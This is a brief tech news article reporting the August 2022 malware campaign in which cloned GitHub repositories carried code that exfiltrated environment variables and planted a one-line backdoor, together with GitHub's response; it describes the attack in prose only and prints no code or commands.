By
Darya Rudz
February 10th, 2023
GitHub developer James Tucker pointed out that the clone repositories with the malicious URL has infiltrated a user’s environment variable and also contained a one-line backdoor.
On Wednesday, August 3, popular developer platform GitHub faced a major widespread malware attack with more than 35,000 “code hits” in a single day. Interestingly, this happens just on the day when more than 8000 Solana wallets were compromised.
GitHub developer Stephen Lucy himself reported about the widespread attack. The developer came across this issue while reviewing a project. Lacy wrote:
“I am uncovering what seems to be a massive widespread malware attack on @github. – Currently over “code hits” on github. So far found in projects including: crypto, golang, python, js, bash, docker, k8s. It is added to npm scripts, docker images and install docs.”
The recent attack on Github has exploited a multitude of projects including crypto, Golang, Python, JavaScript, Bash, Docker and Kubernetes. The malware attack has been specifically targeted at install docs, NPM scripts, and docker images. It is a more convenient way to bundle common shells commands for the projects.
The Nature of the Malware Attack on Github
To access any critical data and dodge developers, the attacker first creates a fake repository. Then the attacker pushes clones of legit projects to GitHub. As per the investigation, the attacker pushed several of these clone repositories as “pull requests”.
Another GitHub developer James Tucker pointed out that the clone repositories with the malicious URL has infiltrated a user’s environment variable and also contained a one-line backdoor. Exfiltrating an environment can provide threat actors some vital secrets. This includes Amazon AWS credentials, API keys, tokens, crypto keys, etc.
But the one-liner backdoor allows remote attackers to execute the arbitrary code on systems of all those who run the script on their computers. As per Bleeping computers, there were deviating results with respect to the timeline of the activity.
The attackers had altered a large majority of repositories with malicious code over the last month. GitHub removed some of the malicious codes from its platform a few hours ago. In an update on Wednesday, GitHub noted:
“GitHub is investigating the Tweet published Wed, Aug. 3, 2022: * No repositories were compromised. * Malicious code was posted to cloned repositories, not the repositories themselves. * The clones were quarantined and there was no evident compromise of GitHub or maintainer accounts.”
Read other tech news on our website.
